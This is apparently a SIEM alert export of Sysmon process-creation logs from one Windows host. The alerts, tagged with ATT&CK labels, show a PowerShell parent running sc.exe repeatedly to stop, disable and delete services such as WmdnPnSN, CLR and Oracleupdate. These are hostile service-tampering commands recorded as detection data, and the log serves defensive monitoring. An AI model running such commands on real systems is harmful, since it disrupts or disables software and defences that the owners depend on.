WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.504703500Z"",""eventRecordID"":""3769"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.500\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010b96c3000}\r\nProcessId: 2596\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.500"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010b96c3000}"",""processId"":""2596"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.748",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.472 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010d86b3000} +ProcessId: 6724 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WmdnPnSN Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WmdnPnSN Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.477042600Z"",""eventRecordID"":""3768"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.472\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010d86b3000}\r\nProcessId: 6724\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WmdnPnSN Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.472"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010d86b3000}"",""processId"":""6724"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WmdnPnSN Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.626",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.413 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010496a3000} +ProcessId: 7888 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.417513500Z"",""eventRecordID"":""3766"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.413\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010496a3000}\r\nProcessId: 7888\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.413"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010496a3000}"",""processId"":""7888"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.552",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.347 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010e0673000} +ProcessId: 8188 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.353006000Z"",""eventRecordID"":""3763"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.347\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010e0673000}\r\nProcessId: 8188\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.347"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010e0673000}"",""processId"":""8188"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.528",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.313 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-001052663000} +ProcessId: 3536 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.316627200Z"",""eventRecordID"":""3761"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.313\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-001052663000}\r\nProcessId: 3536\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.313"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-001052663000}"",""processId"":""3536"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.501",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.296 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-001089653000} +ProcessId: 7864 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.301571200Z"",""eventRecordID"":""3760"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.296\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-001089653000}\r\nProcessId: 7864\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.296"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-001089653000}"",""processId"":""7864"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.456",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.225 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010d6623000} +ProcessId: 5604 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.228502600Z"",""eventRecordID"":""3757"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.225\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010d6623000}\r\nProcessId: 5604\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 